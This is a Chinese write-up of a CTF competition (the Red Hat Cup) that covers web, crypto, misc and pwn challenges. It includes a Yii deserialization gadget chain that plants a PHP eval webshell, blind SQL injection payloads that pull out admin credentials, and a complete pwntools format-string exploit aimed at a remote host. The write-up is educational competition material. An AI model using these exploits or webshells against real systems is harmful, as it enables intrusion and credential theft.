Find it
访问robots.txt有1ndexx.php这个文件的提示,于是猜测是.1ndexx.php.swp
下载获取Index.php源码
通过get请求会将code参数的内容经过过滤后写入到hack.php文件
于是写入phpinfo:
http://eci-2ze8lvwn3slcjmen7myw.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();?%3E
然后访问hack.php
全局搜索flag
Framework
扫描目录,有个www.zip备份文件泄露
下载下来查看源码,在SiteController.php文件中有个反序列化
在网上找到yii反序列化的poc
http://cache.baiducontent.com/c?m=3LbAFz0_U1MpDXeQajsF6xTWz4wPcuA8ku2ccxkFGEZsnPHkvGkZns1v7WaWJuPoG8Qxz11V0dzU_3EoRurznIJzpgDbfguBO24k21cqx9ltcs3xyRqsSlFkhGmkCostpQUp9p2kFbeohcJcRVZGHH_36EDLTMe0RsLMrS6Ah6W&p=97759a42d49a02e709a2c7710f7a&newp=cb7ec45b86cc46ad05bcc7710f7a92695d0fc20e3ad7da01298ffe0cc4241a1a1a3aecbf2c251b07d0c3766c00a54c56ebf436703d0034f1f689df08d2ecce7e72d9&s=cfcd208495d565ef&user=baidu&fm=sc&query=yii%B7%B4%D0%F2%C1%D0%BB%AF&qid=a8ef4ca50000f93e&p1=1
修改poc写入一个一句话:
namespace yiibase{
class View{
}
}
namespace yiirest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("cmd.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbY21kXSk/Pg=="));';
}
}
}
namespace Faker{
use yiirestCreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yiidb{
use FakerGenerator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
$a = new yiidbBatchQueryResult;
$a->checkAccess = array(new yiibaseView(),"evaluateDynamicContent");
echo base64_encode(serialize(new yiidbBatchQueryResult));
}
?>
本地运行得到序列化后的字符串:
然后进行反序列化:
http://eci-2zeg1tmyhxfbs2zo7lle.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjg0OiJmaWxlX3B1dF9jb250ZW50cygiY21kLnBocCIsIGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYlkyMWtYU2svUGc9PSIpKTsiO31pOjE7czozOiJydW4iO319fX0
接着蚁剑连接cmd.php,通过插件Apach_mod_cgi绕过disable_function
然后执行根目录下的readflag文件得到flag
Hpcurve
找到了国外的一篇文章,参考原题:
https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
输出的前24个字节是已知的。在算法中,u[i]代表了u(x )除数的Mumford表示形式中的多项式。我们不知道的是输出的接下来的24个字节,它们对应于RNG的系数。v(x)除数的Mumford表示形式中的多项式,因此我们的任务是以某种方式恢复它们。
import itertools
import struct
p = 10000000000000001119
R.= GF(p)[]; y=x
f = y + prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = b"a"*20 + b"flag"
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.= PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
q = struct.pack('<'+'Q'*len(rs), *rs)
flag = bytes(k^^m for k,m in zip(2*(rng_output+q), enc))
print(flag)
flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}
WebsiteManager
查看页面源码,发现有个image.php
存在数字型盲注
查出表:
select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
查出字段名:
select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/%26%26/**/table_name=0x7573657273
(另一伙伴根据源码的值也猜测字段为username、passsword
跑出用户名:
exists(select/**/1/**/from/**/users/**/where/**/username/**/like/**/%27admin%%27)
http://eci-2ze56uon9iidh9jquq85.cloudeci1.ichunqiu.com/image.php?id=1%26%26exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/%27%%27)
通过burp跑密码
跑出来账号密码:admin/b753c87d26f98ac2b9593
使用file协议获取根目录下的flag
Colorful code
下回压缩包内容:
打开之后data1像是图片RGB的位置,宽高为data1字符长度分解的质数,data2中三个字节是一组RGB
写脚本运行之后为:
|
from PIL import Image import matplotlib.pyplot as plt file2 = open('data2','rb') RGB_data = file2.read() file1 = open('data1') data2 = file1.read().split(' ') result = [] result2 = [] width = 191 high = 37 for i in range(len(RGB_data)//3): data = RGB_data[i*3:i*3+3] r,g,b = data[0],data[1],data[2] result.append((r,g,b)) for i in data2[:-1]: result2.append(result[int(i)]) image = Image.new('RGB',(high,width),(255,255,255)) for j in range(high): for i in range(width): image.putpixel((j,i),result2[i+j*width]) image.save('output.png') |
图片上传npiet online !
得出flag 88842f20-fb8c-45c9-ae8f-36135b6a0f11
签到题
下载压缩包文件:
EBCDIC.txt
搜索EBCDIC得出
直接转换 EBCDIC 转ASCII 得出flag
primegame
题目参考http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/。建立一个25阶的矩阵,使用LLL算法来求格的最短向量,因为flag字符为可见字符,在0-128之间,所以设置边界为0-127。sage脚本如下,其中N是在遍历可能存在的误差,这个值可能会存在多个,但是最后flag是一致的。
import math
from decimal import *
import random
import struct
getcontext().prec = int(100)
primes = [2]
for i in range(3, 100):
f = True
for j in primes:
if i * i < j:
break
if i % j == 0:
f = False
break
if f:
primes.append(i)
keys = []
for i in range(len(primes)):
keys.append(Decimal(int(primes[i])).ln())
arr = []
for v in keys:
arr.append(int(v * int(2) ** int(256)))
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453
#ct =425985475047781336789963300910446852783032712598571885345660550546372063410589918
def encrypt(res):
h = Decimal(int(0))
for i in range(len(keys)):
h += res[i] * keys[i]
ct = int(h * int(2)**int(256))
return ct
def f(N):
ln = len(arr)
A = Matrix(ZZ, ln + 1, ln + 1)
for i in range(ln):
A[i, i] = 1
A[i, ln] = arr[i] // N
A[ln, i] = 64
A[ln, ln] = ct // N
res = A.LLL()
for i in range(ln + 1):
flag = True
for j in range(ln):
if -64 <= res[i][j] < 64:
continue
flag = False
break
if flag:
vec = [int(v + 64) for v in res[i][:-1]]
ret = encrypt(vec)
if ret == ct:
print(N, bytes(vec))
for i in range(2, 10000):
f(i)
flag{715c39c3-1b46-4c23-8006-27b43eba2446}
Parser
该题是分析http协议,其中数据包有个格式化字符串的漏洞,先利用格式化泄露出栈地址和libc地址,然后通过格式化的任意写,改返回地址为one_gadget即可。
完整exp
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./chall',env={'LD_PRELOAD':'./libc-2.27.so'})
#p=process('./chall')
p=remote('47.105.94.48',12435)
p.recvuntil('> ')
string='''POST / HTTP/1.1
Host: 1
User-Agent: 222
Accept: 1
Accept-Language: 1
Accept-Encoding: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: 1
Content-Length: -1n
'''
payload=string+'%227$p%13$p'
#47
p.sendline(payload)
leak=int(p.recv(14),16)
stack=int(p.recv(14),16)
ret=stack+(0x00007fffffffed68-0x00007fffffffe870)
print hex(ret)
libcbase=leak-(0x7ffff7a03b97-0x7ffff79e2000)
print hex(libcbase)
one=libcbase+0x10a45c
print hex(one)
first=one&0xff
sec=one>>8&0xff
thr=one>>16&0xff
four=one>>24&0xff
five=one>>32&0xff
p.recvuntil('> ')
payload=string+("%"+str(first)+"c%42$hhn").ljust(24,'x61')+p64(ret)
#47
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(sec)+"c%42$hhn").ljust(24,'x61')+p64(ret+1)
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(thr)+"c%42$hhn").ljust(24,'x61')+p64(ret+2)
#47
p.send(payload)
p.recvuntil('> ')
#gdb.attach(p,'b *0x000055555555537d')
#raw_input()
payload=string+("%"+str(four)+"c%42$hhn").ljust(24,'x61')+p64(ret+3)
#47
p.send(payload)
p.recvuntil('> ')
payload=string+("%"+str(five)+"c%42$hhn").ljust(24,'x61')+p64(ret+4)
#47
p.send(payload)
p.send(‘111’)
p.interactive()
flag{45540201c332aeff4c0edac9d7588241}
本文始发于微信公众号(山石网科安全技术研究院):第四届红帽杯网络安全大赛WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论